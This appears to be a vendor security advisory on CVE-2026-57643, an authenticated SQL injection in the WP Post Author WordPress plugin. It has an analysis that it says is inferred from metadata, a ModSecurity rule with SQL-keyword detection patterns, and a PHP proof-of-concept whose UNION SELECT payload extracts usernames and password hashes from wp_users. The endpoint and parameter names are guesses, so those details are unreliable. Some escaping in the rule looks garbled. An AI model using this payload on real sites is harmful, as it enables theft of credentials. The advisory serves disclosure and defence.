Atomic Edge analysis of CVE-2026-57643 (metadata-based): This vulnerability is an authenticated SQL Injection in the WP Post Author plugin for WordPress, affecting versions up to and including 3.9.1. It allows attackers with contributor-level access or higher to append malicious SQL queries to existing database queries, enabling extraction of sensitive data from the WordPress database. The CVSS score is 6.5 (medium-high) due to the low-privilege requirement, network attack vector, and high confidentiality impact.
The root cause, as inferred from the CWE-89 classification and description, is improper neutralization of special elements used in an SQL command. The description specifically mentions insufficient escaping on a user-supplied parameter and lack of prepared statement usage in an existing SQL query. Based on the plugin’s functionality, this likely occurs in a database query that handles author profile data, multiple authors assignments, or guest author management. The vulnerable parameter is probably passed via an AJAX handler or REST endpoint that processes author metadata. Without source code, these conclusions are inferred from the CWE and description patterns common to WordPress plugin SQLi vulnerabilities.
For exploitation, an authenticated attacker with contributor-level access can craft a POST request to an AJAX action endpoint such as `/wp-admin/admin-ajax.php?action=wp_post_author_save` or a similar handler that saves or retrieves author profile data. The attacker would supply a malicious value in a parameter (likely an ID or slug field) that contains SQL injection payloads, such as `1 UNION SELECT user_pass,user_login FROM wp_users`. The attacker can then extract sensitive information like user credentials, email addresses, or other database contents. The attack requires a valid nonce and contributor-level capabilities, but the lack of proper parameter sanitization allows subverting the SQL query.
Remediation for this vulnerability, as patched in version 3.10.0, likely involves replacing direct `$wpdb->query()` calls with parameterized queries using `$wpdb->prepare()`. Specifically, the plugin should use `$wpdb->prepare()` with `%s` and `%d` placeholders for any dynamic user input incorporated into SQL statements. Additionally, the plugin should apply `sanitize_text_field()` or `intval()` on input parameters and validate that the user has appropriate capabilities before executing the query. Atomic Edge analysis recommends reviewing all SQL queries in the plugin that handle `$wpdb->get_results()`, `$wpdb->get_var()`, or `$wpdb->query()` calls where user-supplied data is interpolated directly.
The primary impact of successful exploitation is unauthorized access to sensitive information stored in the WordPress database. This includes user credentials (hashed passwords), email addresses, session tokens, and potentially private site options or post content. An attacker could extract user password hashes for offline cracking, leading to account takeover. The authenticated requirement (contributor+) slightly reduces the risk but still exposes internal data. The confidentiality impact is high, while integrity and availability remain unaffected.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-57643 (metadata-based)
# Blocks SQL injection attempts targeting the WP Post Author plugin AJAX handlers
# Assumes the vulnerable action is 'wp_post_author_save' or similar
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261943,phase:2,deny,status:403,chain,msg:'CVE-2026-57643 - WP Post Author SQLi via AJAX (metadata-based)',severity:'CRITICAL',tag:'CVE-2026-57643'"
SecRule ARGS_POST:action "@rx ^wp_post_author_(save|delete|update|get)$"
"chain"
SecRule ARGS_POST:author_id "@rx (?:UNION|SELECT|INSERT|UPDATE|DELETE|DROP|ORs+1=1|'|--|#|b(?:0x[0-9a-fA-F]+|CHAR(|CONCAT(|BENCHMARK(|SLEEP())"
"t:lowercase,t:urlDecode"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-57643 - WP Post Author – Author Box, Multiple Authors, Guest Authors & Custom Avatars <= 3.9.1 - Authenticated (Contributor+) SQL Injection
// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site
$username = 'contributor'; // Attacker's username
$password = 'password'; // Attacker's password
// Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = [
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
// Extract nonce - The AJAX action likely requires a nonce
// The actual action name is inferred from plugin patterns; adjust if needed
$ajax_action = 'wp_post_author_save'; // Common AJAX hook for saving author data
// Step 1: Get nonce from admin page or directly via wp_ajax_nopriv_* check
// Since we need a valid nonce, we first access the admin page where the form is rendered
$ajax_nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=' . $ajax_action;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_nonce_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$nonce_response = curl_exec($ch);
curl_close($ch);
// For simplicity, we assume a nonce can be obtained from the page source.
// In real exploitation, the attacker would scrape the nonce from the form.
// Here we use a placeholder; actual exploitation requires valid nonce.
$nonce = '1234567890abcdef';
// SQL injection payload: UNION-based to extract user credentials
$sql_payload = "1 UNION ALL SELECT user_login,user_pass,user_email,display_name FROM wp_users-- ";
// Send the malicious request
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
'action' => $ajax_action,
'_ajax_nonce' => $nonce,
// Parameter name likely involved - adjust based on actual vulnerable parameter
'author_id' => $sql_payload
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
curl_close($ch);
echo "Raw Response:n";
echo $result;
?>
